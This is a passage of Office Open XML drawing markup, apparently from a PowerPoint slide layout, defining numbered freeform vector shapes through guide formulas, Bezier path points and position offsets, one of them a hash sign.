                  <a:gd name="T1" fmla="*/ 174 h 209"/>
                  <a:gd name="T2" fmla="*/ 134 w 179"/>
                  <a:gd name="T3" fmla="*/ 208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1 w 179"/>
                  <a:gd name="T45" fmla="*/ 68 h 209"/>
                  <a:gd name="T46" fmla="*/ 73 w 179"/>
                  <a:gd name="T47" fmla="*/ 79 h 209"/>
                  <a:gd name="T48" fmla="*/ 63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6 w 179"/>
                  <a:gd name="T85" fmla="*/ 42 h 209"/>
                  <a:gd name="T86" fmla="*/ 78 w 179"/>
                  <a:gd name="T87" fmla="*/ 44 h 209"/>
                  <a:gd name="T88" fmla="*/ 65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6"/>
                      <a:pt x="179" y="180"/>
                      <a:pt x="176" y="183"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="173" y="186"/>
                      <a:pt x="170" y="188"/>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200"/>
                      <a:pt x="113" y="198"/>
                      <a:pt x="109" y="198"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="100" y="198"/>
                      <a:pt x="90" y="198"/>
                      <a:pt x="80" y="198"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="76" y="198"/>
                      <a:pt x="72" y="199"/>
                      <a:pt x="68" y="202"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="66" y="203"/>
                      <a:pt x="64" y="204"/>
                      <a:pt x="63" y="205"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="58" y="208"/>
                      <a:pt x="53"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6"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1" y="162"/>
                      <a:pt x="3" y="160"/>
                      <a:pt x="7" y="160"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="9" y="160"/>
                      <a:pt x="12" y="160"/>
                      <a:pt x="14" y="159"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="19" y="158"/>
                      <a:pt x="22" y="155"/>
                      <a:pt x="23" y="150"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="23" y="150"/>
                      <a:pt x="23" y="150"/>
                      <a:pt x="23" y="149"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="25" y="153"/>
                      <a:pt x="23" y="160"/>
                      <a:pt x="17" y="161"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="15" y="162"/>
                      <a:pt x="12" y="162"/>
                      <a:pt x="9" y="162"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="9" y="162"/>
                      <a:pt x="9" y="162"/>
                      <a:pt x="9" y="162"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="5" y="162"/>
                      <a:pt x="3" y="164"/>
                      <a:pt x="4" y="168"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="5" y="169"/>
                      <a:pt x="5" y="171"/>
                      <a:pt x="6" y="172"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="8" y="176"/>
                      <a:pt x="8" y="180"/>
                      <a:pt x="6" y="183"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="6" y="185"/>
                      <a:pt x="5" y="186"/>
                      <a:pt x="4" y="188"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="4" y="190"/>
                      <a:pt x="4" y="191"/>
                      <a:pt x="6" y="192"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="9" y="193"/>
                      <a:pt x="11" y="194"/>
                      <a:pt x="13" y="194"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="24" y="196"/>
                      <a:pt x="35" y="199"/>
                      <a:pt x="45" y="202"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="49" y="203"/>
                      <a:pt x="52" y="204"/>
                      <a:pt x="55" y="203"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="63" y="202"/>
                      <a:pt x="66" y="197"/>
                      <a:pt x="64" y="190"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="64" y="186"/>
                      <a:pt x="62" y="182"/>
                      <a:pt x="60" y="179"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="54" y="170"/>
                      <a:pt x="49" y="160"/>
                      <a:pt x="42" y="152"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="40" y="149"/>
                      <a:pt x="37" y="147"/>
                      <a:pt x="35" y="145"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="32" y="143"/>
                      <a:pt x="29" y="143"/>
                      <a:pt x="27" y="144"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="26" y="145"/>
                      <a:pt x="25" y="145"/>
                      <a:pt x="25" y="143"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="24" y="140"/>
                      <a:pt x="24" y="137"/>
                      <a:pt x="25" y="134"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="26" y="132"/>
                      <a:pt x="26" y="131"/>
                      <a:pt x="27" y="130"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="30" y="125"/>
                      <a:pt x="32"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0" y="23"/>
                      <a:pt x="122" y="30"/>
                      <a:pt x="122" y="36"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="122" y="40"/>
                      <a:pt x="122" y="43"/>
                      <a:pt x="123" y="47"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="124" y="61"/>
                      <a:pt x="128" y="74"/>
                      <a:pt x="138" y="85"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="150" y="97"/>
                      <a:pt x="156" y="112"/>
                      <a:pt x="159" y="128"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="160" y="133"/>
                      <a:pt x="161" y="138"/>
                      <a:pt x="160" y="143"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="159" y="144"/>
                      <a:pt x="159" y="145"/>
                      <a:pt x="159" y="146"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="158" y="147"/>
                      <a:pt x="158" y="148"/>
                      <a:pt x="157" y="148"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="155" y="149"/>
                      <a:pt x="154" y="150"/>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8"/>
                      <a:pt x="122" y="186"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="121" y="189"/>
                      <a:pt x="121" y="191"/>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1"/>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0"/>
                      <a:pt x="160" y="158"/>
                      <a:pt x="160" y="155"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="160" y="154"/>
                      <a:pt x="160" y="154"/>
                      <a:pt x="161" y="153"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="71" y="69"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="71" y="69"/>
                      <a:pt x="71" y="69"/>
                      <a:pt x="71" y="69"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="72" y="71"/>
                      <a:pt x="74" y="73"/>
                      <a:pt x="77" y="73"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="81" y="74"/>
                      <a:pt x="85" y="73"/>
                      <a:pt x="88" y="71"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="91" y="70"/>
                      <a:pt x="94" y="68"/>
                      <a:pt x="97" y="67"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="98" y="66"/>
                      <a:pt x="100" y="66"/>
                      <a:pt x="101" y="66"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="101" y="65"/>
                      <a:pt x="102" y="66"/>
                      <a:pt x="102" y="66"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="102" y="67"/>
                      <a:pt x="102" y="68"/>
                      <a:pt x="101" y="68"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="101" y="68"/>
                      <a:pt x="100" y="69"/>
                      <a:pt x="99" y="69"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="94" y="71"/>
                      <a:pt x="90" y="74"/>
                      <a:pt x="86" y="77"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="85" y="78"/>
                      <a:pt x="83" y="80"/>
                      <a:pt x="81" y="81"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="78" y="82"/>
                      <a:pt x="75" y="82"/>
                      <a:pt x="73" y="79"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="71" y="77"/>
                      <a:pt x="69" y="74"/>
                      <a:pt x="67" y="71"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="67" y="71"/>
                      <a:pt x="66" y="70"/>
                      <a:pt x="65" y="69"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="65" y="70"/>
                      <a:pt x="65" y="70"/>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99"/>
                      <a:pt x="56" y="100"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="54" y="104"/>
                      <a:pt x="51" y="108"/>
                      <a:pt x="50" y="112"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="47" y="117"/>
                      <a:pt x="46" y="122"/>
                      <a:pt x="46" y="127"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="45" y="130"/>
                      <a:pt x="46" y="133"/>
                      <a:pt x="46" y="136"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="45" y="137"/>
                      <a:pt x="45" y="139"/>
                      <a:pt x="45" y="140"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="44" y="141"/>
                      <a:pt x="43" y="142"/>
                      <a:pt x="42" y="141"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="42" y="140"/>
                      <a:pt x="41" y="139"/>
                      <a:pt x="40" y="138"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="38" y="134"/>
                      <a:pt x="37" y="129"/>
                      <a:pt x="37" y="125"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="38" y="123"/>
                      <a:pt x="38" y="122"/>
                      <a:pt x="38" y="121"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="38" y="121"/>
                      <a:pt x="38" y="121"/>
                      <a:pt x="38" y="121"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="37" y="122"/>
                      <a:pt x="37" y="122"/>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69"/>
                      <a:pt x="69" y="172"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="68" y="175"/>
                      <a:pt x="67" y="176"/>
                      <a:pt x="64" y="177"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="64" y="178"/>
                      <a:pt x="63" y="178"/>
                      <a:pt x="62" y="178"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="63" y="180"/>
                      <a:pt x="64" y="181"/>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3" y="174"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="114" y="173"/>
                      <a:pt x="115" y="172"/>
                      <a:pt x="115" y="173"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="116" y="173"/>
                      <a:pt x="116" y="174"/>
                      <a:pt x="117" y="174"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="117" y="178"/>
                      <a:pt x="116" y="182"/>
                      <a:pt x="115" y="186"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="115" y="188"/>
                      <a:pt x="114" y="190"/>
                      <a:pt x="113"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5" y="146"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="126" y="146"/>
                      <a:pt x="126" y="146"/>
                      <a:pt x="126" y="146"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="127" y="142"/>
                      <a:pt x="129" y="140"/>
                      <a:pt x="132" y="139"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="137" y="138"/>
                      <a:pt x="141" y="138"/>
                      <a:pt x="146" y="141"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="145" y="138"/>
                      <a:pt x="142" y="137"/>
                      <a:pt x="140" y="136"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="145" y="119"/>
                      <a:pt x="135" y="97"/>
                      <a:pt x="126" y="92"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="131" y="97"/>
                      <a:pt x="134" y="103"/>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2" y="103"/>
                      <a:pt x="121" y="98"/>
                      <a:pt x="117" y="95"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="117" y="95"/>
                      <a:pt x="117" y="94"/>
                      <a:pt x="117" y="94"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="115" y="86"/>
                      <a:pt x="112" y="79"/>
                      <a:pt x="107" y="73"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="105" y="70"/>
                      <a:pt x="105" y="67"/>
                      <a:pt x="105"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7"/>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7" y="44"/>
                      <a:pt x="107" y="40"/>
                      <a:pt x="105" y="35"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="103" y="32"/>
                      <a:pt x="100" y="29"/>
                      <a:pt x="96" y="30"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="91" y="30"/>
                      <a:pt x="88" y="33"/>
                      <a:pt x="87" y="38"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="87" y="39"/>
                      <a:pt x="86" y="40"/>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6" y="33"/>
                      <a:pt x="65" y="34"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="63" y="40"/>
                      <a:pt x="63" y="45"/>
                      <a:pt x="66" y="50"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="66" y="50"/>
                      <a:pt x="67" y="51"/>
                      <a:pt x="68" y="51"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="69" y="51"/>
                      <a:pt x="69" y="50"/>
                      <a:pt x="69" y="49"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="68" y="48"/>
                      <a:pt x="68" y="48"/>
                      <a:pt x="67" y="47"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="66" y="45"/>
                      <a:pt x="65" y="42"/>
                      <a:pt x="66" y="40"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="67" y="37"/>
                      <a:pt x="71" y="36"/>
                      <a:pt x="73" y="38"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="74"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0" y="66"/>
                      <a:pt x="74" y="66"/>
                      <a:pt x="78" y="66"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="82" y="66"/>
                      <a:pt x="86" y="65"/>
                      <a:pt x="91" y="64"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="94" y="62"/>
                      <a:pt x="98" y="62"/>
                      <a:pt x="101" y="58"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="101" y="58"/>
                      <a:pt x="102" y="58"/>
                      <a:pt x="103" y="58"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="103" y="59"/>
                      <a:pt x="103" y="60"/>
                      <a:pt x="103" y="60"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="103" y="61"/>
                      <a:pt x="102" y="61"/>
                      <a:pt x="102" y="61"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="96" y="63"/>
                      <a:pt x="91" y="65"/>
                      <a:pt x="86" y="67"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="82" y="69"/>
                      <a:pt x="78"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1" y="43"/>
                      <a:pt x="71" y="44"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="71" y="45"/>
                      <a:pt x="72" y="45"/>
                      <a:pt x="73" y="45"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="97" y="39"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="99" y="40"/>
                      <a:pt x="99" y="42"/>
                      <a:pt x="100" y="44"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="100" y="43"/>
                      <a:pt x="101" y="43"/>
                      <a:pt x="101" y="43"/>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Freeform 52"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4077" y="224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Freeform 53"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4089" y="2249"/>
                <a:ext cx="4" cy="1"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 3"/>
                  <a:gd name="T1" fmla="*/ 0 h 1"/>
                  <a:gd name="T2" fmla="*/ 3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1"/>
                      <a:pt x="3"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Freeform 54"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="20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Freeform 55"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="222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Freeform 56"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="242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Freeform 57"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2620"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Freeform 58"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2770"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Freeform 59"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2918"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4"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Freeform 60"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="311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Freeform 61"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="326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Freeform 62"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="345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Freeform 63"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3656"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Freeform 64"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3805" y="2929"/>
                <a:ext cx="155" cy="248"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 127 w 127"/>
                  <a:gd name="T1" fmla="*/ 100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Freeform 65"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3989" y="2933"/>
                <a:ext cx="189" cy="218"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 189 w 189"/>
                  <a:gd name="T1" fmla="*/ 67 h 218"/>
                  <a:gd name="T2" fmla="*/ 185 w 189"/>
                  <a:gd name="T3" fmla="*/ 84 h 218"/>
                  <a:gd name="T4" fmla="*/ 141 w 189"/>
                  <a:gd name="T5" fmla="*/ 84 h 218"/>
                  <a:gd name="T6" fmla="*/ 132 w 189"/>
                  <a:gd name="T7" fmla="*/ 134 h 218"/>
                  <a:gd name="T8" fmla="*/ 178 w 189"/>
                  <a:gd name="T9" fmla="*/ 134 h 218"/>
                  <a:gd name="T10" fmla="*/ 173 w 189"/>
                  <a:gd name="T11" fmla="*/ 152 h 218"/>
                  <a:gd name="T12" fmla="*/ 128 w 189"/>
                  <a:gd name="T13" fmla="*/ 152 h 218"/>
                  <a:gd name="T14" fmla="*/ 113 w 189"/>
                  <a:gd name="T15" fmla="*/ 218 h 218"/>
                  <a:gd name="T16" fmla="*/ 93 w 189"/>
                  <a:gd name="T17" fmla="*/ 218 h 218"/>
                  <a:gd name="T18" fmla="*/ 106 w 189"/>
                  <a:gd name="T19" fmla="*/ 152 h 218"/>
                  <a:gd name="T20" fmla="*/ 65 w 189"/>
                  <a:gd name="T21" fmla="*/ 152 h 218"/>
                  <a:gd name="T22" fmla="*/ 51 w 189"/>
                  <a:gd name="T23" fmla="*/ 218 h 218"/>
                  <a:gd name="T24" fmla="*/ 30 w 189"/>
                  <a:gd name="T25" fmla="*/ 218 h 218"/>
                  <a:gd name="T26" fmla="*/ 44 w 189"/>
                  <a:gd name="T27" fmla="*/ 152 h 218"/>
                  <a:gd name="T28" fmla="*/ 0 w 189"/>
                  <a:gd name="T29" fmla="*/ 152 h 218"/>
                  <a:gd name="T30" fmla="*/ 4 w 189"/>
                  <a:gd name="T31" fmla="*/ 134 h 218"/>
                  <a:gd name="T32" fmla="*/ 47 w 189"/>
                  <a:gd name="T33" fmla="*/ 134 h 218"/>
                  <a:gd name="T34" fmla="*/ 58 w 189"/>
                  <a:gd name="T35" fmla="*/ 84 h 218"/>
                  <a:gd name="T36" fmla="*/ 12 w 189"/>
                  <a:gd name="T37" fmla="*/ 84 h 218"/>
                  <a:gd name="T38" fmla="*/ 16 w 189"/>
                  <a:gd name="T39" fmla="*/ 67 h 218"/>
                  <a:gd name="T40" fmla="*/ 61 w 189"/>
                  <a:gd name="T41" fmla="*/ 67 h 218"/>
                  <a:gd name="T42" fmla="*/ 75 w 189"/>
                  <a:gd name="T43" fmla="*/ 0 h 218"/>
                  <a:gd name="T44" fmla="*/ 96 w 189"/>
                  <a:gd name="T45" fmla="*/ 0 h 218"/>
                  <a:gd name="T46" fmla="*/ 83 w 189"/>
                  <a:gd name="T47" fmla="*/ 67 h 218"/>
                  <a:gd name="T48" fmla="*/ 124 w 189"/>
                  <a:gd name="T49" fmla="*/ 67 h 218"/>
                  <a:gd name="T50" fmla="*/ 139 w 189"/>
                  <a:gd name="T51" fmla="*/ 0 h 218"/>
                  <a:gd name="T52" fmla="*/ 160 w 189"/>
                  <a:gd name="T53" fmla="*/ 0 h 218"/>
                  <a:gd name="T54" fmla="*/ 145 w 189"/>
                  <a:gd name="T55" fmla="*/ 67 h 218"/>
                  <a:gd name="T56" fmla="*/ 189 w 189"/>
                  <a:gd name="T57" fmla="*/ 67 h 218"/>
                  <a:gd name="T58" fmla="*/ 121 w 189"/>
                  <a:gd name="T59" fmla="*/ 84 h 218"/>
                  <a:gd name="T60" fmla="*/ 79 w 189"/>
                  <a:gd name="T61" fmla="*/ 84 h 218"/>
                  <a:gd name="T62" fmla="*/ 68 w 189"/>
                  <a:gd name="T63" fmla="*/ 134 h 218"/>
                  <a:gd name="T64" fmla="*/ 111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7"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="185" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="141" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="132" y="134"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="178" y="134"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="173" y="152"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="128" y="152"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="113" y="218"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="93" y="218"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="106" y="152"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="65" y="152"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="51" y="218"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="218"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="152"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="152"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="134"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="134"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="58" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="61" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="75" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="96" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="83" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="124" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="139" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="160" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="145" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="189" y="67"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="121" y="84"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="79" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="68" y="134"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="111"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Freeform 66"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4207" y="2929"/>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2"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Freeform 67"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4402" y="2929"/>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Freeform 68"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4600" y="292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Freeform 69"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="474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Freeform 70"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4942"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Freeform 71"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5137"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72"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="533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Freeform 73"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5483"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74"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5680" y="292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5"/>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Freeform 75"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
